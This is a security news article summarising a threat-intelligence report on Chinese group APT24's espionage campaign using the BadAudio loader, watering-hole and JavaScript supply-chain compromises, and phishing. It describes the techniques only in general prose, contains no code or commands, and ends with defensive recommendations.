Google Threat Intelligence Group (GTIG) has detailed a multi‑year cyber espionage operation attributed to the Chinese threat actor APT24 (also known as Pitty Tiger). The campaign, active for roughly three years, targets organizations in the United States and Taiwan and relies on a previously undocumented malware family dubbed BadAudio to steal sensitive intellectual property.
Target sectors and objectives of the APT24 cyber espionage campaign
According to GTIG, APT24 focuses on entities that hold high‑value technological and commercial information. Victims span government agencies, healthcare providers, construction and engineering firms, the mining sector, telecommunications providers, and non‑profit organizations.
The group’s primary objective is long‑term cyber espionage and theft of intellectual property, not opportunistic ransomware or one‑off financial fraud. The attackers seek persistent access to design documentation, R&D data, business strategies, and partner information that can provide strategic or economic advantage.
Watering‑hole and supply‑chain attacks leveraging malicious JavaScript
Watering‑hole attacks with fake software update prompts
From November 2022 to September 2025, APT24 compromised more than 20 legitimate websites across multiple domains in a classic watering‑hole attack. In such campaigns, adversaries infect websites frequently visited by specific targets to silently profile and infect visitors.
The attackers injected malicious JavaScript into site code to perform Windows host fingerprinting, collecting browser and system characteristics. When a visitor matched the group’s targeting profile, the script displayed a fake “software update” pop‑up window. Clicking the prompt delivered the BadAudio malware to the victim’s machine.
JavaScript supply‑chain compromise via Taiwanese marketing provider
Beginning in July 2024, APT24 repeatedly compromised a Taiwan‑based marketing company that distributes JavaScript libraries to its clients. The attackers injected malicious code into a widely used library and registered a domain mimicking a legitimate CDN provider to blend into normal web traffic.
This supply‑chain intrusion allowed APT24 to compromise over 1,000 domains that loaded the tainted script. The technique mirrors previous large‑scale supply‑chain incidents such as SolarWinds Orion and CCleaner, where compromising a single upstream component provided reach into many downstream organizations.
Abuse of JSON files for covert telemetry collection
In a second wave of attacks between late 2024 and July 2025, the same Taiwanese provider was targeted again, but the approach evolved. APT24 embedded obfuscated JavaScript inside a modified JSON file. Once executed, this code collected visitor information and exfiltrated it as a base64‑encoded report to APT24’s command‑and‑control (C2) infrastructure, enabling stealthy reconnaissance.
Phishing, tracking pixels, and abuse of cloud services
In parallel with the web‑based intrusions, APT24 has run targeted phishing campaigns since August 2024. Messages were crafted to appear as if sent from animal protection and welfare organizations, a socially neutral theme designed to lower suspicion and bypass basic user scrutiny.
The emails contained hidden tracking pixels that informed the attackers when recipients opened the messages, helping them prioritize responsive targets for further social engineering. In several cases, APT24 abused legitimate cloud services such as Google Drive and Microsoft OneDrive to stage payloads and receive data, making malicious traffic difficult to distinguish from normal business use.
Inside BadAudio: obfuscated loader using DLL sideloading
DLL search order hijacking and sideloading techniques
BadAudio is described as a heavily obfuscated malware loader designed to quietly deploy additional malicious components. It relies on DLL search order hijacking and DLL sideloading: the attackers place a malicious DLL in a directory where a trusted Windows application will load it first, following the operating system’s normal library search order.
This technique lets the payload run under the guise of a legitimate process, bypassing some traditional defenses and reducing the likelihood of detection by signature‑based tools.
Modular architecture, encryption, and low detection rates
BadAudio’s code is split into multiple discrete blocks orchestrated by a central control routine. This modular architecture complicates both automated sandbox analysis and manual reverse‑engineering, as behavior is scattered and only assembled at runtime.
Once executed, BadAudio gathers basic host data—hostname, username, and system architecture—encrypts it using a hard‑coded AES key, and transmits it to the C2 server. The response contains an encrypted secondary payload that is decrypted and run in memory via DLL sideloading, minimizing disk artifacts and forensic traces.
GTIG reports that of eight known BadAudio samples, only two are detected by more than 25 antivirus engines on VirusTotal. Samples dated 7 December 2022 are flagged by no more than five security products, underscoring the effectiveness of the obfuscation and the tool’s focused, low‑volume deployment.
Implications for defenders and recommended security measures
The APT24 operation illustrates a mature, multi‑layered approach to cyber espionage, combining watering‑hole compromises, JavaScript supply‑chain attacks, tailored phishing, and stealthy loaders. Industry reports such as the Verizon Data Breach Investigations Report (DBIR) and Mandiant M‑Trends have consistently highlighted this trend toward more covert and complex APT tradecraft.
Organizations in sensitive sectors should move from point solutions to a comprehensive cybersecurity strategy that includes rigorous supplier risk management, continuous web asset monitoring, robust email security, and advanced endpoint visibility.
Practical measures include: enforcing integrity checks (such as SRI and file hashing) for third‑party JavaScript; auditing and restricting DLL sideloading through application configuration and allow‑listing; deploying EDR platforms and regular threat hunting focused on obfuscated code and anomalous network connections; strengthening employee training against highly tailored phishing; and enforcing multi‑factor authentication on critical systems.
The APT24 BadAudio campaign demonstrates how state‑aligned actors blend technical sophistication with social engineering and supply‑chain compromise to exfiltrate high‑value intellectual property. Organizations operating in innovation‑driven or geopolitically exposed markets should regularly review their threat models, update defenses, and invest in proactive monitoring to detect similar operations before they escalate into major data loss incidents.
